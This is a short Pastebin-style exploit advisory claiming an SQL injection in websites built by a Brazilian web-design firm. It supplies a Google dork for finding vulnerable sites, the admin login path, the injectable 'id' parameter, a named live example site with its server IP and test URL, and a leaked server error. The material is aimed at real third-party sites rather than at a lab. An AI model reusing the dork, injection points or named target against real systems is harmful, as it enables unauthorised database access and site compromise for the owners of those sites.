KingSkrupellos

FoccusWeb Brasil Sao Paulo Web Design SQL Injection

Jan 10th, 2019
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. ##########################################################
  2.  
  3. # Exploit Title : FoccusWeb Brasil Sao Paulo Web Design SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/01/2019
  7. # Vendor Homepage : foccusweb.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''foccusweb" site:br
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. ##########################################################
  16.  
  17. # Admin Panel Login Path :
  18. *************************
  19. /site/admin/default/login.html
  20.  
  21. # SQL Injection Exploit :
  22. ***********************
  23.  
  24. /site/es/ver_novidade.php?id=[SQL Injection]
  25.  
  26. ##########################################################
  27.  
  28. # Example Vulnerable Site :
  29. *************************
  30. Note : (186.227.197.236) => There are 177 domains hosted on this server.
  31.  
  32. [+] hsluiz.com.br/site/es/ver_novidade.php?id=4%27
  33.  
  34. [ Proof of Concept ] => archive.fo/T4Uik
  35.  
  36. ##########################################################
  37.  
  38. # SQL Database Error :
  39. **********************
  40. Warning: Invalid argument supplied for foreach() in
  41. /home/hsluizc/public_html/site/pt/ver_evento.php on line 70
  42.  
  43. ##########################################################
  44.  
  45. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  46.  
  47. ##########################################################
Add Comment
Please, Sign In to add comment